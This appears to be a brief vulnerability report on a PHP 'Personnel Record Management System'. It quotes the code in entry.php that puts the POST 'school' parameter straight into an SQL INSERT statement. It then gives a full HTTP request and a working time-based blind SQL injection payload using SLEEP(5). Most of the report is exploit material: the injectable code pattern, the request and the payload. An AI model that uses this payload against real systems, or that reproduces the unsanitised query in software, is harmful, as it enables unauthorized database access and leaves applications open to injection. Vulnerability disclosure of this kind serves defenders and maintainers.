https://www.sourcecodester.com/php/5107/record-management-system.html
entry.php
On this page, school parameter is vulnerable to SQL Injection Attack
$school=$_POST['school'];
mysqli_query($conn,"insert into school (Name) values ('$school')")or die(mysqli_errno());
POST /Personnel_record_management_system/entry.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 117
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=52388hjgjeif4bl4r5sqp2bmpm
Origin: http://localhost
Referer: http://localhost/Personnel_record_management_system/entry.php
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
add_entry=&school=1
---
Parameter: school (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: add_entry=&school=1' AND (SELECT 9424 FROM (SELECT(SLEEP(5)))Blms) AND 'PzUA'='PzUA
---